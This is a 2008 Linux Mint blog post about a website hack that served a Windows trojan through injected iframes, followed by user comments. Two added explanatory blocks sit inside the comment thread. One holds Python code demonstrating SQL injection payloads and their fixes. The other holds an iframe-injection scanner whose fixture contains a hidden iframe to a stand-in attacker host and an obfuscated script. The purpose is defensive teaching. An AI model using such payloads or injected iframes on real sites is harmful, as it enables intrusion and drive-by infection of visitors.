Server hacked

Written by Clem on Friday, August 15th, 2008 @ 1:09 pm | Main Topics

Our server was hacked and code was injected into it to make connections on our behalf to pinoc.org and download a trojan called JS/Tenia.d

For more information about this trojan: http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=146254

If you visited linuxmint.com in the last two days we recommend you scan your computer to make sure this trojan isn’t present. As this attack exploited vulnerabilities within our PHP code, we took the opportunity to clean it all and secure every single page against injections in the future. Linuxmint.com is now clean and secure, but we experienced almost 20 hours of downtime and lost almost 2 days of work fixing this.

I personally received a lot of emails from the community, warning us about the problem. I haven’t had time to reply but I would like to thank the people who came forward. If you observe a problem in the future please do not hesitate to report it.

I’d also like to thank Michael (d00p) and Mats (husse) for the help they gave me on this. Husse, as always, catches my attention on what matters and if it wasn’t for d00p, our domain would still be down right now. I also apologize for the downtime and for the inconvenience. Comments and questions are welcome.

97 Responses to “Server hacked”

  1. Waistless Says:

    I find it unacceptable that a distro which uses it’s website as the default homepage was left vulnerable to such an attack. Even if it is Linux, it’s no excuse for relaxed security.

  2. Mike Williams Says:

    For us noobs, how do we scan for a trojan in linux? Most of the info on the internet about linux says we don’t need an antivirus. Can you recommend an application?

  3. jungar Says:

    is it safe to browse now?

  4. jungar Says:

    How do I check for the trojan? I thought Linux Mint was safe, I only have ClamTk antivirus. I never knew we could be infected with trojans!

  5. Steven Brady Says:

    Thanks to clem, d00p, and husse!

  6. Mark Homer Says:

    Ran avast, standard scan on entire system. No trojan found, although some files were not present.

  7. Andy B Says:

    I, for one, appreciate the honesty about items like this. All too often sites silently fix their holes and fail to inform users that anything was ever amiss.

    @jungar, this trojan targets Microsoft Windows clients, it has no effect on Linux desktop users. Any virus scanner updated in the last month will catch it on your Windows install.

  8. abdullah Says:

    Thanks men, but nothing happened at all to my system

  9. Sean Says:

    Who is pinoc.org? What about the packages?

  10. dw5437 Says:

    You have a root kit hunter in Synaptic; search for rkhunter.

  11. Husse Says:

    You are only at risk of being infected by the trojan if you used Windows when you visited us.
    The exploit managed to install an iframe on our site that connected to a server in Hong Kong. As someone in the forum did notice, this iframe could make some unwanted connections, but that did not mean you were infected (Windows users apart).

  12. Clem Says:

    jungar: Yes, it’s safe now. The site was completely cleaned out and secured.

  13. Clem Says:

    You can use clamav under Linux. As far as I’m aware the trojan can’t harm your Linux box but it can harm your Wine applications or your Windows boxes on the same network (via file-sharing for instance). Under Windows, there are loads of good anti viruses, just use your favorite one.

    Also, this attack didn’t specifically target linuxmint.com, we’re just one out of many websites which were hacked. It’s fair to assume that many other websites are still unsafe at this stage. If you browse any of them you will potentially be infected again. Be careful if you’re running Windows or Wine, or even Linux in a network where there are Windows boxes..

    I personally don’t bother with antiviruses but I’m always ready to wipe out a drive and replace the OS. If you’re not fully protected make sure to have up to date backups.

  14. Clem Says:

    Waistless: We make mistakes now and then, when we do we accept them, we communicate and we learn from them. Will we ever be hacked again? Of course we will. Soon or later another hacker will find a breach, but it won’t be the same breach. Right now we’ve looked at what was missing and we took action. You can find mistakes acceptable or unacceptable, for me what’s truly relevant is whether we let them happen again without learning from them. As to the level of acceptability, it’s entirely up to you whether you keep the default page as it is, or even keep using Linux Mint at all. We do our best to tackle problems, to report them and to communicate with our user base.

    Sean: pinoc is just one dummy domain used by the hackers to spread the trojan. The packages are fine and the repository for Elyssa is on a separate server.

  15. Sean Says:

    Sounds good, guys. It’s actually kind of ironic that win32 viruses are what we’re worrying about still. I know many of us probably have linuxmint as our homepage, for our Firefox browser on our Linux desktop. I feel safe, that’s why I use linux. Minor issue + Timely resolution = Increased confidence in Linux and Mint. Thanks a lot, guys. Keep up the good work.

  16. digital moonfish Says:

    Thank you Clem for your honesty and forward thinking. It is a Windows/Wine issue but as you say some homes have the 2 OSs.
    So I thank you for the heads up and for the fix..

  17. Just_a_question Says:

    Good day to you sirs. I visited linuxmint.com yesterday using Mozilla Firefox 3.0.1 under Ubuntu Linux 8.04. Am I ok? I own also a home network that consists of my ubuntu box and a windows xp box.

  18. hms Says:

    Uh, I’m a little confused; if linux boxes aren’t affected, how exactly did it affect your server? Are you running windows on the server by any chance? I know it’s probably a dumb question, but I’m not a geek, I just like using Mint!

    Thanx,
    hms

  19. xwin78 Says:

    Clem & team,

    Thank you for being transparent, even about miscues / oversights! It’s just another reason to LOVE MINT and back the team even more!

    Thanks again

    xwin78

  20. Mage66 Says:

    Thanks for addressing this problem so quickly, and being honest about it. This shows one of the virtues of the Linux Community well.

    Thanks for a great distro, and for acting swiftly to address this problem.

  21. AvanceIT Says:

    Great job guys !

    Any site that is as popular as the Linux Mint site is going to get attacked, the attackers are hoping there are going to be vulnerable windows users using it, fortunately most are Linux Users and therefore have nothing to worry about.

    I take my hat off to you guys, it must be a constant nightmare trying to keep the hackers and attackers out !

    The great thing about this is your honesty and willingness to learn from it, fantastic attitude, there are many large organisations who could learn from your example!

    Mike.

  22. Adam Says:

    Well that explains the “connection blocked” message I got when connecting with a Windows machine to d/l a Mint CD. Of course, I am super paranoid with the Windows box, so it auto-runs a virus scan overnight, every night… (Sadly, due to a proprietary piece of software I run for storm spotting, I have 1 Windows box since the software won’t run in WINE or VMWARE.)

    -Adam

  23. Chris Says:

    The only inconvenience to me was that I couldn’t download packages using software portal (Just completed a fresh installation of mint)

    Bit of a shock? yes.
    Put me off using Mint as a distro? hell no.

    Could I suggest adding the NoScript Firefox extension to the distro as standard? Not entirely sure if it would have helped in this case, but it would probably have highlighted the redirect and iframe.

    Chris

  24. hms Says:

    Okay, sorry, I re-read the first sentence above, I understand now that server was not infected with JS/Tenia.d, it was hacked to make connections to the download site for the trojan. Still, I’m wondering, in general terms, how the “code was injected” for the original hack, and also just for general info, what kind of server setup you’ve got.

    Thanks again,
    hms

  25. maybeway36 Says:

    Will ClamWin do the trick for Windows scanning?

  26. Acid_1 Says:

    I can say the Mint team did better than what MS would’ve done. “Our servers crashed and took 8 hours to reboot” ;) .

  27. Ariel Says:

    Thanks for fixing the problem. At least I was on a Mac, not Windows, when I tried to make the account so I don’t think I’ll have a problem with the trojan.

  28. rja Says:

    Waistless, feel free to offer to help the distro team. I’m sure they would probably appreciate committed people that want to help move both linux and the Mint distribution along. But the key word here is “committed”.

  29. slider Says:

    Geez Waistless give Clem and the guys a break! After all we are all only human. :-) LINUX MINT RULES!

    Thank you Clem and team for the good work you do! :-)

  30. hms Says:

    I want to second slider’s comment. You guys do a great job, I’m not criticizing you, I’m just curious about how it happened, is all.

    Keep up the good work,
    hms

  31. Husse Says:

    Waistless has a valid point but as the internet has grown into one large crime scene things like this will happen. Cybercrime is unfortunately not taken seriously enough….

  32. Sean Says:

    Husse: Hear, hear!

  33. Ahbrahm Says:

    yes great job on the news…it made me install Avast..but I love ML, since 3.0

  34. Dev Says:

    What files does it infect?

    or what is its filename?

    I’ve looked and nothing shows up…

  35. Clem Says:

    OK, so how did it happen? I’m not entirely sure.. there were no obvious traces left by the attacker (which was likely to be an automated attacker). We talked about it with d00p and since we weren’t sure, we started to think of how it could have happened.. and then we realized part of the php code we were using was vulnerable to SQL injection.

    http://en.wikipedia.org/wiki/SQL_injection

    So after d00p cleaned everything up I spent the night reviewing every single PHP script we had and I secured all the breaches I could find with intval and mysql_escape_real_string calls.

    If that was how we were hacked then it shouldn’t happen again.. not this way anyway.

    Also, I made a backup of all our scripts and I’ll be talking to d00p to automate that as well, so we can simply wipe/overwrite the filesystem the next time without cleaning things up manually (that’s to minimize the downtime and the exposure to the hack).
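Clem’s comment above describes the defect (request parameters pasted straight into SQL text) and the two fixes he applied: intval for numeric fields and string escaping for text fields (the function he means is PHP’s mysql_real_escape_string; the comment transposes the name). The following is an added example, not code from linuxmint.com, that reproduces the defect and both fixes in Python against an in-memory SQLite database standing in for the site’s MySQL backend, and adds the parameterized form that makes both unnecessary. The table, its rows, the payloads and the escape helper are constructed for the illustration; the helper only doubles single quotes, which is what SQLite expects, whereas mysql_real_escape_string also escapes backslashes and NUL bytes for the connection’s charset.

```python
"""Added example, not linuxmint.com code: the SQL injection Clem describes,
shown against an in-memory SQLite database (constructed data) standing in
for the site's MySQL backend, with the two fixes he names and the
parameterized form that replaces both."""
import re
import sqlite3


def make_db():
    """Build a small constructed table; 'internal-build' is a row the public
    page must never return."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE packages (id INTEGER PRIMARY KEY, name TEXT, public INTEGER)")
    conn.executemany("INSERT INTO packages VALUES (?, ?, ?)", [
        (1, "mintmenu", 1),
        (2, "mintupdate", 1),
        (3, "internal-build", 0),
    ])
    return conn


def names(conn, sql, params=()):
    return [row[0] for row in conn.execute(sql, params)]


def lookup_vulnerable(conn, package_id):
    """The 'before': the request parameter is pasted into the SQL text."""
    return names(conn, "SELECT name FROM packages WHERE public = 1 AND id = "
                 + package_id + " ORDER BY id")


def intval(value):
    """Mimics PHP's intval(): keep the leading integer, otherwise 0."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def lookup_intval(conn, package_id):
    """Fix 1 (numeric fields): coerce to an integer before it reaches SQL."""
    return names(conn, "SELECT name FROM packages WHERE public = 1 AND id = %d ORDER BY id"
                 % intval(package_id))


def search_vulnerable(conn, name):
    """Same defect on a text field: a quote in the input closes the literal."""
    return names(conn, "SELECT name FROM packages WHERE public = 1 AND name = '"
                 + name + "' ORDER BY id")


def escape_sql_string(value):
    """Fix 2 (text fields): escape the quote so the input stays inside its
    literal. Constructed helper: doubles single quotes as SQLite expects;
    mysql_real_escape_string also handles backslashes and NUL bytes."""
    return value.replace("'", "''")


def search_escaped(conn, name):
    return names(conn, "SELECT name FROM packages WHERE public = 1 AND name = '"
                 + escape_sql_string(name) + "' ORDER BY id")


def lookup_parameterized(conn, package_id):
    """Preferred fix: bind the value; the driver never splices it into SQL text."""
    return names(conn, "SELECT name FROM packages WHERE public = 1 AND id = ? ORDER BY id",
                 (package_id,))


def search_parameterized(conn, name):
    return names(conn, "SELECT name FROM packages WHERE public = 1 AND name = ? ORDER BY id",
                 (name,))


if __name__ == "__main__":
    conn = make_db()
    payload = "1 OR 1=1"
    print("vulnerable   :", lookup_vulnerable(conn, payload))      # every row leaks
    print("intval       :", lookup_intval(conn, payload))          # payload reduced to 1
    print("parameterized:", lookup_parameterized(conn, payload))   # nothing matches
    text_payload = "x' OR '1'='1"
    print("vulnerable   :", search_vulnerable(conn, text_payload))
    print("escaped      :", search_escaped(conn, text_payload))
    print("parameterized:", search_parameterized(conn, text_payload))
```

The intval fix works because the leading digits are all that survive, so the non-public row never appears, but it silently turns garbage into 0 or 1; the parameterized form is the one to reach for on every field, numeric or text, because there is no SQL text for the input to alter.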

  36. hamburn Says:

    Thanks guys for the honesty and your fast work. Sh.t can happen.

    But I dislike you how you use of the phrase “hacker”.
    Being an old school user since the 80s, for me
    hackers are the good guys, people like you.
    Isn’t there the phrase “crackers” for the criminals?

    Thanks for MINT again, I love it.
    The best OS I ever had.

    H.

  37. dr Says:

    are your servers running windose

  38. jungar Says:

    thank you Husse and Clem,

    We all appreciate your hard work and dedication. This is but a small stumble, I love linux mint, and will stick with it through thick and thin.

  39. Donald F. Truax Says:

    Good News:

    It’s all they can do to find a weak point in Linux Mint….they can hack your site, but, the OS is rock solid :)

    You know you’re doing something right when they hack your site, they just can’t stand the might of Linux Mint!!!

    Keep on kicking butt, your OS is nothing short of E X C E L L E N T :) ))

    Better than all the rest and simply the BEST Linux NOS that I’ve seen.

    Best

    _Don

    CEO TSCS Incorporated

    http://www.tscscorp.net

  40. dnmint Says:

    A good, fast response. Also the closeness, camaraderie of the Group- Developers & Users is the ‘plus’ for me using Mint.
    Thanks Clem Husse d00p.

  41. Deadguy Says:

    I too would like to thank Clem and Husse for
    being quick to act as well as inform the community of this
    attack.

    I of course, will stand behind Linux Mint 100% as always:)

  42. technosaurus Says:

    Whew – I just missed it – Luckily I’ve been working with Puppy linux for the last couple of weeks designing a puppy themed web desktop and hadn’t been to the site. In hindsight, perhaps I should have designed it for Mint first as a start page – glad to hear its fixed though.

  43. Roberto Says:

    @Clem Says:
    August 15th, 2008 at 5:29 pm

    Waistless: We make mistakes now and then, when we do we accept them, we communicate and we learn from them. Will we ever be hacked again? Of course we will. Soon or later another hacker will find a breach, but it won’t be the same breach. Right now we’ve looked at what was missing and we took action. You can find mistakes acceptable or unacceptable, for me what’s truly relevant is whether we let them happen again without learning from them. As to the level of acceptability, it’s entirely up to you whether you keep the default page as it is, or even keep using Linux Mint at all. We do our best to tackle problems, to report them and to communicate with our user base.

    Thanks Clem.

    I will not change my default home page. (2 computers – Gnome Main
    Edition 5 – Kde Ce 5 RC ) It’s up to me and i want it.
    For Debian Gnu/Linux – Main page is Debian Org.

    @Clem – Will we ever be hacked again? Of course we will.

    Yes, it can be true because we live in a cruel world.

    Fedora: no good news.
    Something going wrong with Fedora

    http://lwn.net/Articles/294188/

  44. Kurt Frank Says:

    Most unfortunate, but these things happen. A valuable reminder that no matter what OS you use, one should avoid running with Admin rights, especially when browsing the web (defence in depth strategy).

    From almost every MS security bulletin:
    “Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.”
    Good advice no matter how you feel about them.

  45. ubuntuuser Says:

    Thanks for transparency!

    This SQL injection run has been going on for months and has been well publicized in security blogosphere.

    Good site to keep you in the loop with regards to major security news is Internet Storm Center isc.sans.org.

    The run targets unpatched IIS servers (for which patches have been released YEARS ago) and any website which has failed to sanitize their SQL queries.

    Sanitizing SQL queries is a basic security practice and most likely automated vulnerability scanning tools would have caught this oversight. Maybe somebody more knowledgeable about such tools could give you a recommendation.

  46. kezdeth Says:

    @Waistless Come on. It’s the internet. Crackers and script-kiddies are all around, and you can’t stop them. They won’t stop their stupid crap, and no one is safe from them. Look at it this way: Clem and the team found the attack, fixed the vulnerability, and stayed honest with us about what happened. How much more could you ask?

    It’s a great distro, and now it turns out that it has a good and honest maintainer, who isn’t afraid to admit to mistakes! (And be honest, we *all* make mistakes!)

    I, for one, will continue to stand behind and support Mint, and the team.

  47. rog Says:

    couldn’t agree more

  48. Tak178 Says:

    Hey Clem,

    Seeing as I use Mint exclusively at this point, I am relieved to hear that you were able to take care of this in such a timely fashion. You guys are truly professionals. From one Irish brother to another, thank you so much for your hard work!

  49. orgthingy Says:

    Maybe this would be rude to say, but I’d be pretty happy that Windows users are reading this article, freaking out, and realizing how Windows can be hacked through a simple script :P ! Well, it’s good to be honest, it will attract the insecure Windows users :P

  50. Ahbrahm Says:

    My father (the resident geek) is a 71 year old retired truck driver.
    He slipstreamed his winxp/sp3 onto a cd to give away.
    He then removed win/xp from his now strictly linux box.
    He runs linuxmint elyssa 5 rc1, elyssa 5 & kanotix thorhammer rc7 on 2 drives & considers windoze a shoddy product not worth the price & linux something worth having & it is free.
    He has been running linux for 2 years.

  51. Thomas Says:

    I think I already know the answer to this, but is wine only vulnerable if my web browser is being run with wine? Or can it be affected if I’m running Firefox natively?

  52. super4pi Says:

    @Waistless:

    I find it unacceptable that you cannot distinguish between “its” and “it’s”.

  53. rbanavara Says:

    good work Clem & team. It was a relief that I use windows rarely after I started using Mint.

    I have a query though, I have a common FAT32 partition to share the files. Is there a chance of a virus being dormant in this partition & affecting things when I start Windows?

    And I assume this won’t affect NTFS partitions that are NOT mounted.

  54. Tim Says:

    Thanks Clem & Husse,
    that’s the reason I use and like Linux MINT so much.

    @Waistless more popular → more hackers and nobody is perfect
    [but I'm sure they work on it ;) ]

  55. ScotLinux Says:

    Unfortunately, I do use Windows; not through choice, you understand, but by necessity (I have an ancient PC). I am, however, in the process of getting (perhaps, building?) a new PC, and I plan to make the leap to Linux, with Mint being on the shortlist of distros to try.

    Thankfully, I didn’t visit the site when affected, and I would agree with others who point out that we live in an imperfect world, and problems occur; the fact that the Mint team have been up front & honest about it, not to mention the speed with which the problem has been addressed, has bolstered Mint’s position on my distro shortlist – well done all, from a (hopefully) soon to be Linux convert.

  56. AfterEight Says:

    Thanks to ALL at Linux Mint.
    This is why I moved over to Linux in the first place.
    Security, Peace of Mind, Openness / Transparency and Honesty.
    All that and the Helpfulness of its Members.

    Thanks again,
    AfterEight

  57. Jim Nygård Says:

    Thank you very much for the honesty, most sites refuse to inform their visitors about things like this.

    I do not have any Windows computers, so I feel pretty safe. But, thanks again for the honesty.

  58. Mathieu Says:

    @Thomas – If you were running firefox natively, your wine is in no danger.

    As for the Linux Mint team : A very big thanks to you all for being what an OS maintainer should be. Amazing how refreshing a little honesty can be. When I finish my studies, I will be making a few donations to repay the linux community for all the Microsoft free good times.

  59. Olaf Says:

    This is why I hate PHP, it gives Linux a bad rap. Most of the breakins into Linux or Unix systems are because of PHP and probably sloppy programming (SQL injection attack).

  60. Jack Says:

    Just installed clamav from apt-get but don’t know how to open it :S
    I’m using Daryna KDE

  61. VeN0mizer Says:

    Infecting the site with a windows based virus where the majority of the visitors are using linux…..real intelligence there ;) And we’re fearing these people….why?

  62. Zeke Carr Says:

    http://www.catb.org/~esr/faqs/hacker-howto.html
    Your site was breached by a Cracker. Hackers don’t break anything on purpose. This original treatise is not my work but proper credits are given on the link.

  63. Xanikseo Says:

    I am a little surprised that you were not aware of the possibility of SQL injection based attacks on the site. I know you want to carry on concentrating on the development of the project but perhaps someone should invest some time solely to research and fix common security holes in PHP in particular.

    Very mature to tell us about it though, clem! Little by little this honesty will attract more users I’m sure! ;)

  64. William Says:

    Thanks Clem & team for the quick heads up on this. I am a newbie to Linux and Mint and scrambled to find an anti virus program that I could use. I wound up using Kaspersky Online Scanner 7 for linux. It took almost 30 min to run but I came out clean..no virus or trojan.

    I tried to download Clam. It downloaded somewhere? The main thing is an early warning and a clean scan. I have much to learn about Mint/Linux…..William

  65. hamburn Says:

    the only way to keep script kiddies and crackers away is to cut the line to the net. So what. They found it, they worked it out.

    Nothing to worry or wine about afterwards.

    Thanks for the team again

    H.

  66. exploder Says:

    I appreciate the honesty about what happened. We were not the only site that got hit by this. These things happen and the situation was very well handled. Thanks Clem!

  67. Randy Says:

    Hopefully this will serve as a wakeup call to increase security generally. Although I like Linux Mint, it is very disturbing that none of the packages are digitally signed. If someone had managed to compromise one of the package servers, we would all be exposed. You need to cryptographically sign all valid packages, and keep the private key completely inaccessible from the internet.

  68. Harish Says:

    Thanks to Clem and the Mint Linux team for being honest and communicating this matter to everybody. That’s the difference between other corporates like M$ and the Linux community. Honesty and hard work pay off. Keep up the good work Clem and team.

    Cheers,
    Harry

  69. Shahid Says:

    Thanks for a quick and honest response to the community. This demonstrates a responsible, efficient and well managed organization.

    As a small business, we will continue to use and support Linux Mint on all our computers.

    As a personal Linux Mint lover, I always recommend the Linux Mint OS to all my friends and anyone who expresses an interest in using or learning about the open source community.

  70. sailor Says:

    Where is the crystal clear step by step instruction what to do ?!

    Mint is a user-friendly distro, which does not claim that you need to be a Linux specialist. So please no cryptic hints like

    - we recommend you scan your computer
    - search for rkhunter
    - You can use clamav under Linux

    Please – Just a step by step instruction which every one can follow.

  71. Clint Says:

    The website uses Linux and Apache. If you want to check what a server runs just visit netcraft.com and type the name of the website for info on server. http://toolbar.netcraft.com/site_report?url=http://www.linuxmint.com

  72. DL Says:

    It is interesting how they chose to name the trojan. Taenia/tenia is a kind of tapeworm.

    http://en.wikipedia.org/wiki/Taenia_(tapeworm)

  73. ADS Says:

    According to the professionals, the scans are automated, affect primarily Linux servers and serve several purposes.

    1. To attempt to gain root on the server,
    2. To plant malicious script in the webpages which will,
    3. Perform a redirect to a “masked” website where the machine will be scanned for vulnerabilities,
    4. With the goal of obtaining URL/password associations that are valuable and/or obtaining another client machine for a botnet used for spamming.

    I apologize for the length.

    The trojan is a mild one and serves the function of a “rabbit” to make everyone happy that they “found” something. That it is a Windows trojan is not surprising. The vast majority of boxes in the West contain Windows. However, the trojan is a rabbit, something to “find”. What will it do if in the box? Make your anti-virus sound a klaxon horn.

    It was not script kiddies and it is doubtful that it was someone out to get Mint. Husse mentioned that even the Apache server was messed up.

    Any box that is not secured is “open” to scripts if scripting is enabled. Clem gave a clue on that issue when he said that he runs the Web with an “empty” box that can be wiped and a fresh install done without tears. Of all the advice on this website, that is the best and most practical. You can do that with just an extra, clean install on a separate partition, as in dual boot or however many you want. You can even try to break one chap’s record of more than 100 installations on one box using the GRUB chainloader and not installing to the MBR.

    If you have sensitive and/or critical data, do not join that box to a network (Web) over which you have no control. You control only your box while networked to the Web. At a bare minimum, if it is all in the same box, have the files encrypted, each critical folder separately. Websites are used for infections/scans because your ISP has secured (hopefully) its network to a certain degree. Consequently, it is you yourself that make the connection to a compromised network (Web) and perhaps never regarded it as such – yet.

    Nearly any box can be compromised depending upon the resources of the hacker. Thousands of infected websites operate in the US daily. And, that includes websites that are huge and famous.

    If you create your own passwords, make them something that it would take NSA longer than 60 seconds to crack. Unix/Linux has been hacked for years. Think about it – a 6 month release schedule equals more “bugs” (of which some are security related) than a 12 month release schedule. Same amount of code each time, but 2 instances to make errors. Additionally, Linux is a collaborative effort that comprises a huge total of different, separate code pools. Debian has more than 20,000 application/programs available. All from different folk. Of varying abilities and even perhaps intentions.

    The Linux desktop has escaped largely because there simply aren’t enough to make it profitable to crack them. Now, in Asia, that is a different story. Which simply proves that Chinese and Japanese are not yet universal languages. Additionally, in the PRC, folk are shot for such things without regard for “ethnicity”. In the West, they are seldom even prosecuted. Many get cushy jobs as “gurus”.

    The security of your box is your responsibility. A default Linux installation is not as secure as it could be. That is why books 6 inches thick are written about Linux security. Bob Toxen has written an excellent book, although it is a bit long in the tooth. There are others.

    An example – Mint deliberately makes it easy for those who lack knowledge to make Windows volumes available for “sharing”. Automated “exposure”. I do not mean that critically but it is simply a fact. If permissions are weak, the mounted volume is open. As Linux becomes “Windows-like” it does not by default become more secure.

    Most of you can relax. You store nothing of marketable value on your boxes. However, the goal of the hack was to find URL/password associations, such as those used at commercial sites.

    If someone visited with JS off on a Windows box, were they affected? If someone visited with a Linux box with JS on, were they affected?

    This is where “affected” = “scanned” , not merely trojaned.

    Basic, inherent security in Linux rests in the Open code arrangement. If you can’t read it, then you do the “rest” of the security measures available to you and secure your box. Repeating the mantra “windoze sucks” will not secure your little box.

    Since I sat in front of this one, this from Windoze XPsp3, Noscript in Firefox 3.0.1.

    final Note – Google “WordPress security flaws” and see what comes up.

  74. Angus McBattleby Says:

    The little buggers ought to be flogged senseless for carrying on with that sort of shenanigans. I’d clout ‘em with me claymore if I got a hold of ‘em, I would.

  75. euklidis Says:

    Do not worry guys. This trojan doesn’t affect Linux, only Windows boxes.

  76. Steve Cobbs Says:

    Congratulations Mint team for getting this out as soon as you did. I use Mint and still will continue to use it. This wasn’t one of those show stopping things you see on that O.S. out of Redmond. But with all things considered, no O.S. is 100% bullet proof but it sure beats the type of security threats MS users deal with on a daily basis. This problem actually posed a 0% threat towards Linux users but the threat was a big deal for users of MS Windows visiting your site at the time of the threat.

    Ironically, the shop I work in was all MS PCs when I started there. After a year I was able to convince my boss of the benefits of using Linux, especially Mint. Linux has saved my bosses’ a** many times over. Now we have several systems that co-exist but I don’t use WINE or VirtualBox on any of them, so that I can keep them pure. Mint Team, keep doing the fine job that you are doing. I am running Elyssa (Xfce) on my very old laptop. This allowed me to dump Win98 for a much more secure modern O.S. like Mint/Elyssa, so I truly appreciate the fine work that you are doing.

    And yes “windoze sucks” but not at the expense of propping up Linux Mint. Governments and Universities all over the world are dumping MS because of unfair licensing schemes that lock you in and benefits MS completely. Oh did I forget to mention, the worms, viruses, trojans, spyware, malware and the rootkits.

    In hindsight this was more of settings issue than a vulnerability, an oversight in the webmaster’s scope. They took the appropriate actions immediately and shared it with the public. This is how you build confidence and trust in the Linux community.

    So which O.S. flaws pose the greater threat? The ones you find on Windows, Macs or Mint (Linux)? Windows does have its advantages, but security is not one of them. Mint Rocks!

  77. ADS Says:

    FedoraProject “infrastructure” went “down” in about the same time frame. They have Yum back now, as of the 18th. There is still no explanation forthcoming although one is promised.

    Their “openness” is a bit tardy. Clem’s (and the Gang) was right up front.

    Curious how many others went down during that time frame.

  78. xMoDx Says:

    Virus Characteristics

    This detection covers scripts in which malicious iFrame(s) are appended to the end of an HTML page, i.e. after the tag.

    The recent variant also included Javascript-obfuscated malicious iFrames. These iFrames will lead to redirection of the browser window to browser exploits that will download and execute malware on the user’s computer.
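Husse’s comment 11, the McAfee description quoted just above, and Clem’s plan to keep a clean copy of the scripts and overwrite the filesystem all point to the same defender’s check: know what each served page should look like and flag whatever was appended. The following is an added example, not code from linuxmint.com, that runs that check in Python over two constructed pages: it compares a page against a SHA-256 baseline, flags any content after the closing </html> tag, and flags hidden iframes, iframes to any host other than the expected one, and inline scripts carrying the unescape()/eval()/String.fromCharCode obfuscation markers. The page contents, the attacker.invalid host and the SITE_HOST value are constructed placeholders, not data from the incident.

```python
"""Added example (not linuxmint.com code): a defender's check for the
appended-iframe injection described in the comments. Pages, hosts and the
baseline digest are constructed for the illustration."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.linuxmint.com"   # assumed: the only host the pages should frame

# Constructed: what the served page is supposed to look like.
CLEAN_PAGE = """<html><head><title>Linux Mint</title>
<script>var section = 'home';</script></head>
<body><h1>Linux Mint</h1>
<a href="http://www.linuxmint.com/download.php">Download</a></body>
</html>
"""

# Constructed: the same page with a block appended after </html>, the
# pattern the McAfee description calls out (hidden iframe plus an
# obfuscated script that writes another one).
INJECTED_PAGE = CLEAN_PAGE + (
    '<iframe src="http://attacker.invalid/in.cgi?3" width="0" height="0"></iframe>\n'
    "<script>document.write(unescape('%3C%69%66%72%61%6D%65%3E'))</script>\n"
)

OBFUSCATION = re.compile(r"unescape\(|eval\(|String\.fromCharCode")


def sha256_of(text):
    """Baseline digest of a page as deployed from the clean backup."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


class PageInspector(HTMLParser):
    """Collects iframe attributes and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_page(html, baseline_sha256=None):
    """Return a list of findings; an empty list means the page looks untouched."""
    findings = []
    if baseline_sha256 and sha256_of(html) != baseline_sha256:
        findings.append("content differs from baseline")
    end = re.search(r"</html\s*>", html, re.IGNORECASE)
    if end and html[end.end():].strip():
        findings.append("content after </html>")
    inspector = PageInspector()
    inspector.feed(html)
    for frame in inspector.iframes:
        host = urlparse(frame.get("src", "")).hostname
        if host and host.lower() != SITE_HOST:
            findings.append("iframe to external host " + host)
        if (frame.get("width", "").strip() in ("0", "1")
                or frame.get("height", "").strip() in ("0", "1")):
            findings.append("hidden iframe")
    for body in inspector.scripts:
        if OBFUSCATION.search(body):
            findings.append("obfuscated script")
    return findings


if __name__ == "__main__":
    baseline = sha256_of(CLEAN_PAGE)
    print("clean   :", scan_page(CLEAN_PAGE, baseline))      # []
    print("injected:", scan_page(INJECTED_PAGE, baseline))   # five findings
```

Run it over every file under the web root with the digests recorded when the clean backup was deployed; the baseline comparison catches any change at all, and the three content checks explain what changed without anyone reading the page by hand.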

  79. rbanavara Says:

    Hi Sailor, let me put together a step by step guide (with all due disclaimers!):
    – If you use ONLY & ONLY Linux – don’t bother, you are safe
    – If you dual boot with Windows OR share a partition / USB storage device with Windows, it’s better to scan that for viruses (if it was used / connected when you had connected to the infected site).
    – From mint, install clamav (from mint install search clamav)
    – then open a Terminal & use the following:

    clamscan -r -i

    ex: clamscan -r -i /media/FAT32
    -r – search all the directories & sub directories
    -i – list only the infected files
    /media/FAT32 is the directory where my USB drive is connected to

  80. flameproof Says:

    My 2 cents: Mint is a slick, hassle-free distro and I should know, I’ve tried nearly all of the majors (homepage? DistroWatch, of course) at one point or another. The folks here have done a slam-up job of providing the Open Source/GNU community and its followers with a clean, healthy, easy-to-install version of the most powerful OS on the planet. Thank you and thanks for caring enough to share the security glitches with us also.

    Oh, and Daryna (Fluxbox) flat-out rocks.

  81. Dutra de Lacerda Says:

    Since the release of (more or less) Thunderbird is sent by the repository NOT SIGNED… for that reason I never downloaded it as it should be a fake. Strange thing… now in the repository it shows doubled! Both 2 files… the bin and the gnome-connection… so 4 files appear… Maybe not if you downloaded them.

    My suggestion is to have separate servers… a working one and a copy connected to the net… But now it may be too late. The original should be built from scratch… copying what is apparent in the server… until it looks ok… but never exchanging ANYTHING except data.

    Then the new rebuilt server may be copied to the server.
    How can anyone be sure that this extreme solution is not necessary?
    You can't… unless such a Master work system already exists to be copied from time to time… but if it did… no time would be lost reconstructing the one connected… So…

    Hope it helps… Maybe things are not so bad… but the ability to hide control from legitimate administrators is high… and security WAS compromised and no-one can be sure to what extent… appearances are not evidence of anything. Extreme solutions should be carried out… just in case the worst is hidden.

    A linux server is as appealing as a regular weak Windows system… especially to Windows fans or whatever… so the worst must be assumed and a strategy for such a scenario should always be implemented… especially in the case of an important distro as this is.

    Security is not assuming security but having a good architecture (in this case a separation between the real thing and a copy linked to the net… in between: a void!)

    So in this msg you find 2 things… a warning about the repositories… and another about the present connection allowing progressing of an invasion… knowing a good invasion does not show.

    In ignorance… restart from scratch using what is apparent as a map.
    Regards,
    DuLac.

  82. sailor Says:

    thanks rbanavara for clear instruction.

    I have a plain Linux system.

    But as I use sometimes wine, I shall follow your steps. Guess it will not hurt me :-) .

  83. Dutra de Lacerda Says:

    P.S. –

    What I meant with the previous message is that linux is MUCH safer… but NOT 100% secure as such a thing does NOT exist… thus the suggestion for safe procedures out of control by the outside.

